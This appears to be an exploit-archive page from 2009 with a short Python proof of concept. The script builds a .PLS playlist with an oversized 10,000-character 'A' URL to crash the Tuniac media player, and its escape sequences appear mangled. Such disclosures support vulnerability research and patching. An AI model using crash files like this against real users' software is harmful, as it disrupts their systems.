[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Tuniac v.090517c (.PLS File) Local Crash PoC
# Published : 2009-09-14
# Author : zAx
# Previous Title : FotoTagger 2.12.0.0 (.XML File) Buffer Overflow PoC
# Next Title : PowerISO 4.0 Local Buffer Overflow PoC


#!/usr/bin/env python
# Tuniac v.090517c (.PLS) Crash PoC
# By : zAx
# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download

buffer = ("[playlist]x0ANumberOfEntries=1x0AFile1=http://" + "x41" * (10000));

f = open('Crash_Poc.PLS','w');
f.write(buffer);
f.close();

# www.Syue.com [2009-09-14]